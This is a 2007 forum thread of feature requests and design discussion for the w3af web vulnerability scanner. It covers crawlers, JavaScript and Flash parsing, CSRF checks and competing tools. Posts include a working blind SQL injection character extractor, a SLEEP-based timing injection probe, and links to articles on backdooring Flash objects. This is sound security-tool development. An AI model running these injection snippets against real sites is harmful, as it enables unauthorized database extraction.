w3af - feedback and feature requests
Posted by: andresRiancho
Date: November 22, 2007 07:02AM

Hi!

Given that this forum is full of web application security experts =), I would like to get some feedback regarding the w3af project [0]. Also, if any of you guys have a feature request, do not hesitate to ask for it via email or in this forum thread.

[0] http://w3af.sourceforge.net/

--
Andres

Re: w3af - feedback and feature requests
Posted by: ntp
Date: November 23, 2007 09:19PM

how about a built-in JSE for ajax crawling, swfrw integration so it can walk flash, and libexif to extract/view EXIF metadata? support for java applets, google gears, JFX, silverlight, and AIR would also be very cool. web services support such as REST and others would be great - as well as going beyond SOAP/XML injections to add XSD mutations and all the stuff that Shreeraj Shah talked about at the OWASP AppSec 2007 conference at eBay in San Jose. there was also a talk on csrf that mentioned the new owasp CSRFTester tool, which would also be interesting to integrate (i only knew about Chris Shiflett's and pdp's csrf redirectors before this tool became available).

i really think you should concentrate more on the core of the program as well - finding sqli, xss, and hrs. i'd like to see better concepts for blind sqli, 2nd-order sqli, inference attacks (like absinthe), etc. same goes for xss, but instead using double/triple encoding, canonicalization, compression use and further obfuscation, and the DOM (i.e. something better than HackVertor). you already have some good ideas and code here - but i'd like to see improvements such as an increased time-to-hack that could possibly use fingerprinting or user-defined criteria to enhance the testing of these issues.
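for reference, the absinthe-style inference trick boils down to this (a from-scratch sketch, not w3af code - the url, the parameter and the "In stock" marker are all made up): binary-search each character of a value through a true/false page oracle.

import urllib, urllib2

BASE = "http://target.example/item.php?id=1"  # hypothetical target

def oracle(condition):
    # true/false question: the page shows the marker only when the
    # injected condition holds
    url = BASE + urllib.quote(" AND " + condition)
    return "In stock" in urllib2.urlopen(url).read()

def extract_char(expr, pos):
    # binary search over printable ascii: ~7 requests per character
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("ASCII(SUBSTRING(%s,%d,1))>%d" % (expr, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

print(extract_char("(SELECT user())", 1))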

new attacks such as found in sensepost's squeeza and suru tools might also be interesting additions. additionally, techniques such as the fortify javascript hijacking (really just csrf-based json hijacking) would be interesting to implement.

i'd like you to combine aspects of passive analysis techniques such as those found in proxmon or pantera.

i wonder if you could get better use out of pyparsing instead of beautifulsoup for future versions.

Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: November 24, 2007 08:39AM

ntp,

That's what I call a feature request message! =) Going to answer inline:

ntp Wrote:
-------------------------------------------------------
> how about a built-in JSE for ajax crawling, swfrw
> integration so it can walk flash, and libexif to
> extract/view EXIF metadata?

Right now I'm playing with pykhtml, pyxpcom and zc.testbrowser.real to define what is the best approach to executing and analyzing javascript. Regarding flash, I still haven't started with that; I didn't even know swfrw existed (and google only returns some slightly related search results when I search for swfrw +flash, could you give me the project URL?).
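For example, if zc.testbrowser.real works the way plain zope.testbrowser does (an untested sketch based on the docs; the link text is made up), driving a real Firefox would look like:

from zc.testbrowser.real import Browser

browser = Browser()
browser.open('http://localhost/')
browser.getLink('login').click()  # clicks a real link in the live DOM
print(browser.contents)           # rendered, post-javascript HTML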

Regarding EXIF metadata, that could be done easily, but it's not such an important feature compared with javascript and flash analysis.

> support for java
> applets, google gears, JFX, silverlight, and AIR
> would also be very cool.

I see this list of features as a lot harder to implement. I will add them to the TODO list, but don't expect them to appear for at least one year. Right now I'm the only one contributing to the w3af project and I don't really have much time, so if you know anyone that wants to contribute, let me know =)

> web services support
> such as REST and others would be great - as well
> as going beyond SOAP/XML injections to add XSD
> mutations and all the stuff that Shreeraj Shah
> talked about at the OWASP AppSec 2007 conference
> at eBay in San Jose.

REST web services were on my TODO list, but I don't really think they are that important right now.

> there was also a talk on csrf
> that mentioned the new owasp CSRFTester tool,
> which would also be interesting to integrate (i
> only knew about Chris Shiflett's and pdp's csrf
> redirectors before this tool became available).

I have coded a csrf plugin; it's simple but it does its work. I'll take a look at the CSRFTester tool to see if I'm missing something.
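The basic idea behind the check is simple; a simplified sketch of the concept (not the actual plugin code) would be to flag POST forms that carry no unpredictable-looking hidden field:

from BeautifulSoup import BeautifulSoup  # the BeautifulSoup 3-era import

def csrf_candidates(html):
    suspects = []
    for form in BeautifulSoup(html).findAll('form'):
        if form.get('method', 'get').lower() != 'post':
            continue
        hidden = form.findAll('input', {'type': 'hidden'})
        # crude heuristic: any long-ish hidden value counts as a token
        if not any(len(h.get('value', '')) >= 16 for h in hidden):
            suspects.append(form.get('action', ''))
    return suspects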

> i really think you should concentrate more on the
> core of the program as well - finding sqli, xss,
> and hrs. i'd like to see better concepts for
> blind sqli, 2nd-order sqli, inference attacks
> (like absinthe), etc.

Better concepts like what?

> same goes for xss, but
> instead using double/triple encoding,
> canonicalization, compression use and further
> obfuscation, and the DOM (i.e. something better
> than HackVertor). you already have some good
> ideas and code here - but i'd like to see
> improvements such as an increased time-to-hack
> that could possibly use fingerprinting or
> user-defined criteria to enhance the testing of
> these issues.

Right now I only detect xss and "exploit" it with BeEF; I don't really plan on doing much more with xss. Maybe in the future, when all the other features are finished, I'll port BeEF to python or something like that... or maybe someone in this forum will do it for me? ;)

> new attacks such as found in sensepost's squeeza
> and suru tools might also be interesting
> additions.

The work that squeeza does is done in w3af with sqlmap (which is a great tool!).

If by suru features you mean: "Suru not only catches requests that were made by the user, but also requests that use the IE object, such as rich applications using web services, MSN ads, Google Earth requests, application auto-updates etc. The proxy understands multi part POSTs (MPPs) and XML POSTs (used for web services)." I don't think this is a must-have feature.

> additionally, techniques such as the
> fortify javascript hijacking (really just
> csrf-based json hijacking) would be interesting to
> implement.

Going to look into that.

> i'd like you to combine aspects of passive
> analysis techniques such as those found in proxmon
> or pantera.

Yes, that's A GREAT idea, and I'm sure it will be implemented in the future. I still have to finish the "fully automated" section of w3af, and then I'll plug proxmon / pantera in, or maybe I'll code something from scratch myself.

> i wonder if you could get better use out of
> pyparsing instead of beautifulsoup for future
> versions.

Hmmm, I don't really see why you want me to use pyparsing instead of beautifulsoup. Could you explain this?

And finally I also want to say that a gtk GUI is already on the TODO list =) If any of you wants to contribute to the w3af project, you are welcome! As you can see, there is a lot of work to be done; the project is just starting and your help will be appreciated.

--
Andres

Re: w3af - feedback and feature requests
Posted by: ntp
Date: November 25, 2007 06:35PM

andresRiancho Wrote:
-------------------------------------------------------
> That's what I call a feature request message!
> =) Going to answer inline:

Actually I wanted to address some stuff on your mailing-list and in the presentation that you did as well, but I didn't want it to look like I'm stalking you.

> Right now I'm playing with pykhtml, pyxpcom and
> zc.testbrowser.real to define what is the best
> approach to executing and analyzing javascript.

I would be very impressed with a browser driver, such as the Zope testbrowser. Other options include WebDriver (really HtmlUnit in Java), Selenium RC (many languages), Sahi, RBNarcissus, Wati[rnj], firewatir, etc. One of my favorite utilities is CAL9000 because it can be used in more than one web browser - however it's no longer in active development. What's your opinion on "nextgen tools will run from the browser" - http://www.gnucitizen.org/blog/the-next-generation-of-security-tools-will-run-from-the-browser ?

The direction of Wapiti towards RubyfulSoup is interesting to me, but I think this will end up being the wrong approach.

In-browser, you run into speed issues - and going cross-browser with your crawling and parsing just makes matters worse. Consider how Selenium works great with XPath or native tests in Firefox, but then try and use those on IE... the native tests won't work and the XPath selectors are way too slow.

I think pdp and John Resig figured out how to do this properly in a lot of scenarios using jQuery or whatever the Technika Security Framework is going to end up using (jquery-[include|json]?), but then again sometimes it doesn't work out.

Some people I know prefer using CSS selectors or DOM locators (native or not), I'm not sure why. I think using native (e.g. document.getElementsByClassName in Firefox 3) is certainly going to be the fastest approach (it's 8 times faster than XPath), but for browser drivers I almost don't care about fast as much as I do portability across platforms (Mac OS X, XPSP2, Vista especially) and browsers (FF 1.5/2/3, IE3/4/5/6/7, Opera, and Safari)... because I'd want to use it to test XSS, which is different depending on the browser/JSE implementations.

Really, I think these should be done with XPath (falling back to DOM locators), except that XPath doesn't work great in IE with Selenium, where the general recommendation is to convert all the XPath expressions to DOM expressions. This actually seems like a lot of work, but it really is probably the best approach for browser drivers as things stand today. Personally, I think WebDriver, Selenium, and Sahi are all about equal when it comes to browser driving, while I would probably prefer firewatir/Watir for crawling Ajax just for speed.
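e.g. with the old selenium-rc python client (an untested sketch - server assumed on localhost:4444, page and element names made up), the same element through the three locator strategies:

from selenium import selenium  # the rc client, not a webdriver

sel = selenium("localhost", 4444, "*firefox", "http://target.example/")
sel.start()
sel.open("/login")
for locator in ("xpath=//input[@name='user']",
                "dom=document.forms[0].user",
                "css=input[name=user]"):
    print("%s -> %s" % (locator, sel.is_element_present(locator)))
sel.stop()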

For speed in Web 1.0, I always thought FEAR::API's use of larbin provided the best results
http://search.cpan.org/dist/FEAR-API/lib/FEAR/API.pm
http://larbin.sourceforge.net/index-eng.html

While Wapiti is moving towards the "more web 2.0 support with best parsing support", I see Grabber moving towards the "using Qt/C++ will make this faster, and thus, better" approach.

I wish more crawlers would provide more configurable options. I've always liked Burp Spider's ability to deal with forms and go from interactive crawling to automated and back.

Some commercial scanners allow going from DFS (depth-first) to BFS (breadth-first) just by marking a checkbox. What if I want something instead that would be more like a covert crawl - http://www.layerone.info/archives/2006/presentations/Covert_Crawling-LayerOne-Billy_Hoffman.pdf ?
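the toggle itself is trivial to offer - same frontier, just pop from the other end of the deque (sketch; fetch() and extract_links() are made-up helpers):

from collections import deque

def crawl(start, fetch, extract_links, depth_first=False, limit=500):
    frontier, seen = deque([start]), set([start])
    while frontier and len(seen) < limit:
        url = frontier.pop() if depth_first else frontier.popleft()
        for link in extract_links(fetch(url)):
            if link not in seen:
                seen.add(link)
                frontier.append(link)
    return seen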

My point is that each website that a person is targeting has different options, so providing only one way of crawling or parsing is not going to work for some websites or some testers.

> Regarding flash, I still haven't started with
> that; I didn't even know swfrw existed (and google
> only returns some slightly related search results
> when I search for swfrw +flash, could you give me
> the project URL?).

Well I was thinking of anything that could read and write SWF files, such as http://www.swftools.org

e.g. swfdump -D file.swf | grep URL

For writing, I was thinking something more along the lines of
http://www.docuverse.com/blog/donpark/2007/11/18/client-side-swf-generation-tip
or http://www.gnucitizen.org/blog/aflax-and-something-more
for you know... backdooring flash objects - http://www.gnucitizen.org/blog/backdooring-flash-objects-receipt
or writing in flash redirects - http://www.mcgrewsecurity.com/blog/?p=60
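the read half could be as thin as a wrapper around that pipe (sketch):

import re, subprocess

def swf_urls(path):
    # same as `swfdump -D file.swf | grep URL`, from python
    out = subprocess.Popen(['swfdump', '-D', path],
                           stdout=subprocess.PIPE).communicate()[0]
    return sorted(set(re.findall(r'https?://[^\s\'"]+', out)))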

> If by suru features you mean

i meant the timing attack stuff they added to it and none of the rest

> Hmmm, I don't really see why you want me to use
> pyparsing instead of beautifulsoup. Could you
> explain this?

no particular reason, other than i'd like to see more people build on it because it appears more elegant to me. i haven't played much with it either, but i'd be interested to hear your thoughts on the matter.

> And finally I also want to say that a gtk GUI is
> already on the TODO list =) If any of you wants to
> contribute to the w3af project, you are welcome!
> As you can see, there is a lot of work to be done;
> the project is just starting and your help will be
> appreciated.

i'm on the mailing-list and will chime in when i have interesting things to say or add. if i have time (in 2008), i'll gladly contact you and see what i can work on then. you and everyone who has worked on w3af have done great work so far... i really have nothing to say about it except that it's great.

are you going to keep the GUI and CLI tools separate or make the CLI go away?

Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: November 26, 2007 08:36AM

ntp Wrote:
-------------------------------------------------------
> andresRiancho Wrote:
> -------------------------------------------------------
> > That's what I call a feature request message!
> > =) Going to answer inline:
>
> Actually I wanted to address some stuff on your
> mailing-list and in the presentation that you did
> as well, but I didn't want it to look like I'm
> stalking you.

It's ok; if you don't want to look like a stalker in public, mail me in private ;) Good feedback and new ideas are ALWAYS welcome.

> > Right now I'm playing with pykhtml, pyxpcom and
> > zc.testbrowser.real to define what is the best
> > approach to executing and analyzing javascript.
>
> I would be very impressed with a browser driver,
> such as the Zope testbrowser. Other options
> include WebDriver (really HtmlUnit in Java),
> Selenium RC (many languages), Sahi, RBNarcissus,
> Wati[rnj], firewatir, etc. One of my favorite utilities
> is CAL9000 because it can be used in more than one
> web browser - however it's no longer in active
> development.

I really like your comments, because they include a lot of tool names that I don't even know. I will look up all these tools and give you feedback, maybe on the w3af mailing list, when I decide which tool to use to analyze js. One thing you must keep in mind is that w3af aims to be pure python, so many of the tools you mention are slightly out of scope.

> What's your opinion on "nextgen
> tools will run from the browser" -
> http://www.gnucitizen.org/blog/the-next-generation-of-security-tools-will-run-from-the-browser ?

pdp thinks that javascript is the future of the world; I don't agree at all. JS / XSS / web 2.0 etc. are interesting things to play with, and in some cases vulnerabilities, that's all.

> The direction of Wapiti towards RubyfulSoup is
> interesting to me, but I think this will end up
> being the wrong approach.

I thought that Wapiti was coded in python; I don't know why they would use RubyfulSoup if Beautiful Soup exists... strange choice!

> In-browser, you run into speed issues - and going
> cross-browser with your crawling and parsing just
> makes matters worse. Consider how Selenium works
> great with XPath or native tests in Firefox, but
> then try and use those on IE... the native tests
> won't work and the XPath selectors are way too
> slow.
>
> I think pdp and John Resig figured out how to do
> this properly in a lot of scenarios using jQuery
> or whatever the Technika Security Framework is
> going to end up using (jquery-[include|json]?), but then again
> sometimes it doesn't work out.
>
> Some people I know prefer using CSS selectors or
> DOM locators (native or not), I'm not sure why. I
> think using native (e.g.
> document.getElementsByClassName in Firefox 3) is
> certainly going to be the fastest approach (it's 8
> times faster than XPath), but for browser drivers
> I almost don't care about fast as much as I do
> portability across platforms (Mac OS X, XPSP2,
> Vista especially) and browsers (FF 1.5/2/3,
> IE3/4/5/6/7, Opera, and Safari)... because I'd
> want to use it to test XSS, which is different
> depending on the browser/JSE implementations.
>
> Really, I think these should be done with XPath
> (falling back to DOM locators), except that XPath
> doesn't work great in IE with Selenium, where the
> general recommendation is to convert all the XPath
> expressions to DOM expressions. This actually
> seems like a lot of work, but it really is
> probably the best approach for browser drivers as
> things stand today. Personally, I think
> WebDriver, Selenium, and Sahi are all about equal
> when it comes to browser driving, while I would
> probably prefer firewatir/Watir for crawling Ajax
> just for speed.
>
> For speed in Web 1.0, I always thought FEAR::API's
> use of larbin provided the best results
> http://search.cpan.org/dist/FEAR-API/lib/FEAR/API.pm
> http://larbin.sourceforge.net/index-eng.html

I will test all the tools and let you know my opinions about them.

> While Wapiti is moving towards the "more web 2.0
> support with best parsing support", I see Grabber
> moving towards the "using Qt/C++ will make this
> faster, and thus, better" approach.

About Grabber, I like these features:

# Simple AJAX testing
# JavaScript source code analyzer
# Hybrid analysis/Crystal ball testing using PHP-SAT

The nicest feature is the hybrid analysis, I would like to add that, but adding a php-sat dependency is too much. I want to keep a good balance between features and dependencies.

About the "using Qt/C++ will make this faster, and thus, better" approach, i don't think thats necessary true..., the highest delay of this kind of tools is the HTTP request/response time, so a C++ core is not a *must have* feature.

> I wish more crawlers would provide more
> configurable options. I've always liked Burp
> Spider's ability to deal with forms and go from
> interactive crawling to automated and back.
>
> Some commercial scanners allow going from DFS
> (depth-first) to BFS (breadth-first) just by
> marking a checkbox. What if I want something
> instead that would be more like a covert crawl -
> http://www.layerone.info/archives/2006/presentations/Covert_Crawling-LayerOne-Billy_Hoffman.pdf ?
>
> My point is that each website that a person is
> targeting has different options, so providing only
> one way of crawling or parsing is not going to
> work for some websites or some testers.

Adding this as a feature request for w3af =)

> > Regarding flash, I still haven't started with
> > that; I didn't even know swfrw existed (and google
> > only returns some slightly related search results
> > when I search for swfrw +flash, could you give me
> > the project URL?).
>
> Well I was thinking of anything that could read
> and write SWF files, such as
> http://www.swftools.org
>
> e.g. swfdump -D file.swf | grep URL

Once again, this is a fight of dependencies against features.

> For writing, I was thinking something more along
> the lines of
> http://www.docuverse.com/blog/donpark/2007/11/18/client-side-swf-generation-tip
> or http://www.gnucitizen.org/blog/aflax-and-something-more
> for you know... backdooring flash objects -
> http://www.gnucitizen.org/blog/backdooring-flash-objects-receipt
> or writing in flash redirects -
> http://www.mcgrewsecurity.com/blog/?p=60

That would make a cool attack plugin.

> > If by suru features you mean
>
> i meant the timing attack stuff they added to it
> and none of the rest

+ Support for response timing analysis.

If you check the w3af svn, you will see that I had this feature, but I ended up removing it just because it didn't work. I think that the implementation was the problem, and maybe the sensepost guys did it the right way? We'll see...
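If I implement it again I would do something like this (a sketch only; the payload and the threshold are illustrative): sample each URL several times and compare medians, instead of trusting a single measurement.

import time, urllib2

def median_time(url, n=5):
    samples = []
    for _ in range(n):
        t0 = time.time()
        urllib2.urlopen(url).read()
        samples.append(time.time() - t0)
    samples.sort()
    return samples[n // 2]

base = median_time("http://target.example/item.php?id=1")
slow = median_time("http://target.example/item.php?id=1%20AND%20SLEEP(5)")
print("timing signal!" if slow > base + 4 else "no timing signal")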

> > Hmmm, I don't really see why you want me to use
> > pyparsing instead of beautifulsoup. Could you
> > explain this?
>
> no particular reason, other than i'd like to see
> more people build on it because it appears more
> elegant to me. i haven't played much with it
> either, but i'd be interested to hear your
> thoughts on the matter.

I haven't played with pyparsing, but beautifulsoup does the work, does it in pure python, and without much trouble. From what I have seen, pyparsing would fail to analyze badly written HTML (most pages), while beautifulsoup will fix that HTML and give w3af something that is sanitized and much more "ready to use".
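A small example of what I mean (sketch): markup like this is everywhere, and beautifulsoup still gets the links out of it.

from BeautifulSoup import BeautifulSoup

broken = '<html><body><a href="/one">one<p><A HREF=/two>two</body>'
soup = BeautifulSoup(broken)
print([a.get('href') for a in soup.findAll('a')])
# should print ['/one', '/two'] despite the unclosed tags,
# the mixed case and the unquoted attribute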

> > And finally I also want to say that a gtk GUI is
> > already on the TODO list =) If any of you wants to
> > contribute to the w3af project, you are welcome!
> > As you can see, there is a lot of work to be done;
> > the project is just starting and your help will be
> > appreciated.
>
> i'm on the mailing-list and will chime in when i
> have interesting things to say or add. if i have
> time (in 2008), i'll gladly contact you and see
> what i can work on then. you and everyone who has
> worked on w3af have done great work so far... i
> really have nothing to say about it except that
> it's great.

Great! I hope to read more from you in the future, and I would gladly receive your help with any of the points we have been talking about.

> are you going to keep the GUI and CLI tools
> separate or make the CLI go away?

w3af's CLI will never disappear; a GTK (or some other toolkit) GUI will be created for ease of use.

--
Andres

Re: w3af - feedback and feature requests
Posted by: nEUrOO
Date: December 14, 2007 08:13AM

andresRiancho Wrote:
-------------------------------------------------------
> > While Wapiti is moving towards the "more web 2.0
> > support with best parsing support", I see Grabber
> > moving towards the "using Qt/C++ will make this
> > faster, and thus, better" approach.
>
> About Grabber, I like these features:
>
> # Simple AJAX testing
> # JavaScript source code analyzer
> # Hybrid analysis/Crystal ball testing using PHP-SAT
>
> The nicest feature is the hybrid analysis, I would
> like to add that, but adding a php-sat dependency
> is too much. I want to keep a good balance between
> features and dependencies.
>
> About the "using Qt/C++ will make this faster, and
> thus, better" approach, I don't think that's
> necessarily true... the biggest delay in this kind
> of tool is the HTTP request/response time, so a
> C++ core is not a *must have* feature.

Argh, I missed the discussion, but let me comment on it anyway. So yes, I'm starting Grabber over with a core in Qt/C++/WebKit.
WebKit is important since the new tool will have webkit as the core parser and should therefore be able to execute JavaScript, Flash and whatever else with good plugins.

The idea is actually to move to another type of tool where the pen-tester will be able to create his own attacks (made as plugins in either C++ or JavaScript). The pen-tester would also be able to crawl the website manually with a browser, and the steps would be repeated for the attacks.
So, as you see, it's moving to a totally different approach, not fully automated for now.

As I would like to keep the backward features of Grabber, I will plug in something I've been developing (it still needs work): php-ast/oracle -- http://trac2.assembla.com/php-ast -- and I will also try to add a JavaScript static analyzer.

So much for the Grabber ads. As for the C++ core engine, I think it's interesting if you want to move to more comprehensive detection. Detecting strings is simple and fast; trying to do smart detection is more complex (using AI or not) and thus needs a faster engine, especially if you want to combine different detections on the same attacks and keep the results as knowledge for the next detections...

My 2 cents.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Re: w3af - feedback and feature requests
Posted by: lpilorz
Date: December 14, 2007 05:45PM

Hi,
are you planning to add mod_rewrite support for w3af in the future?

Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: January 03, 2008 12:41PM

nEUrOO Wrote:
-------------------------------------------------------
> andresRiancho Wrote:
> -------------------------------------------------------
> > > While Wapiti is moving towards the "more web 2.0
> > > support with best parsing support", I see Grabber
> > > moving towards the "using Qt/C++ will make this
> > > faster, and thus, better" approach.
> >
> > About Grabber, I like these features:
> >
> > # Simple AJAX testing
> > # JavaScript source code analyzer
> > # Hybrid analysis/Crystal ball testing using PHP-SAT
> >
> > The nicest feature is the hybrid analysis, I would
> > like to add that, but adding a php-sat dependency
> > is too much. I want to keep a good balance between
> > features and dependencies.
> >
> > About the "using Qt/C++ will make this faster, and
> > thus, better" approach, I don't think that's
> > necessarily true... the biggest delay in this kind
> > of tool is the HTTP request/response time, so a
> > C++ core is not a *must have* feature.
>
> Argh, I missed the discussion, but let me comment
> on it anyway. So yes, I'm starting Grabber over
> with a core in Qt/C++/WebKit.
> WebKit is important since the new tool will have
> webkit as the core parser and should therefore be
> able to execute JavaScript, Flash and whatever
> else with good plugins.

I agree that having webkit as a base is a really good choice. I disagree with the language selection; I think that developing in C++ will take much more time than in python.
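Just to show what I mean (a sketch only, assuming the brand-new PyQt4 QtWebKit binding; I haven't tried this inside w3af): the same webkit engine, driven from python.

import sys
from PyQt4.QtCore import QUrl
from PyQt4.QtGui import QApplication
from PyQt4.QtWebKit import QWebPage

class Render(QWebPage):
    def __init__(self, url):
        self.app = QApplication(sys.argv)
        QWebPage.__init__(self)
        self.loadFinished.connect(self._done)
        self.mainFrame().load(QUrl(url))
        self.app.exec_()  # blocks until _done() quits the loop

    def _done(self, ok):
        # HTML after javascript has run, unlike a raw urllib fetch
        self.html = unicode(self.mainFrame().toHtml())
        self.app.quit()

print(Render('http://target.example/').html)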

> The idea is actually to move to another type of
> tool where the pen-tester will be able to create
> his own attacks (made as plugins in either C++ or
> JavaScript).

I vote for javascript! If you use plugins in C++, wouldn't you need a C++ compiler?

> The pen-tester would also be able to
> crawl the website manually with a browser, and the
> steps would be repeated for the attacks.
> So, as you see, it's moving to a totally different
> approach, not fully automated for now.

It's a good approach; w3af also has this kind of feature, check the spiderMan plugin:

http://w3af.sourceforge.net/pluginDesc.php#spiderMan

> As I would like to keep the backward features of
> Grabber, I will plug in something I've been
> developing (it still needs work): php-ast/oracle
> -- http://trac2.assembla.com/php-ast -- and I will
> also try to add a JavaScript static analyzer.

We have talked about this in private, and I must say it in public: I love the idea of combining static code analyzers and blackbox testing. I hope that w3af can have static code analysis plugins in the future, but first I need a stable core, and there are still a lot of plugins that are missing or not working as expected.

> So much for the Grabber ads. As for the C++ core
> engine, I think it's interesting if you want to
> move to more comprehensive detection. Detecting
> strings is simple and fast; trying to do smart
> detection is more complex (using AI or not) and
> thus needs a faster engine, especially if you want
> to combine different detections on the same
> attacks and keep the results as knowledge for the
> next detections...
>
> My 2 cents.

You plan to use some complex algorithms and possibly AI? I want to see that code!

--
Andres

Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: January 03, 2008 12:46PM

lpilorz Wrote:
-------------------------------------------------------
> Hi,
> are you planning to add mod_rewrite support for
> w3af in the future?

I'm not sure what you mean by this, but w3af can find vulnerabilities in URL filenames. For example, w3af could find an XSS in parameter2, given the following original URL:

http://localhost/directoryA/scriptName/parameter1-parameter2-parameter3

w3af will perform the following requests:

http://localhost/directoryA/scriptName/JAVASCRIPT-parameter2-parameter3
http://localhost/directoryA/scriptName/parameter1-JAVASCRIPT-parameter3
http://localhost/directoryA/scriptName/parameter1-parameter2-JAVASCRIPT

And analyze the responses.
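The mutant generation itself looks roughly like this (a sketch of the idea, not the actual w3af code):

def mutate_path_params(url, payload='JAVASCRIPT'):
    prefix, params = url.rsplit('/', 1)
    parts = params.split('-')
    for i in range(len(parts)):
        fuzzed = parts[:i] + [payload] + parts[i + 1:]
        yield prefix + '/' + '-'.join(fuzzed)

for u in mutate_path_params('http://localhost/directoryA/scriptName/'
                            'parameter1-parameter2-parameter3'):
    print(u)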

--
Andres

Re: w3af - feedback and feature requests
Posted by: lpilorz
Date: January 05, 2008 05:40AM

I rather meant crawler configuration, to save time when example.com/X.html is rewritten to example.com/script.php?var=X.
For an application with a lot of rewriting it's a must-have scanner feature; otherwise there will be millions of URLs to crawl.
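Something as simple as a user-supplied rule table would already help (sketch; the rule matches my example above):

import re

REWRITE_RULES = [
    # /X.html is really /script.php?var=X, so collapse it
    (re.compile(r'^/(?P<var>[^/]+)\.html$'), '/script.php?var=%(var)s'),
]

def canonicalize(path):
    for pattern, template in REWRITE_RULES:
        m = pattern.match(path)
        if m:
            return template % m.groupdict()
    return path

print(canonicalize('/X.html'))  # -> /script.php?var=X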

Re: w3af - feedback and feature requests
Posted by: andresRiancho
Date: January 06, 2008 08:50PM

lpilorz Wrote:
-------------------------------------------------------
> I rather meant crawler configuration, to save time
> when example.com/X.html is rewritten to
> example.com/script.php?var=X.
> For an application with a lot of rewriting it's a
> must-have scanner feature; otherwise there will be
> millions of URLs to crawl.

Oh, that is a really good feature request! Thanks for the good idea; I'm adding it to my task list. It's not going to be easy, but I hope to have this feature ready for the 1.0 version.

Thanks!

--
Andres
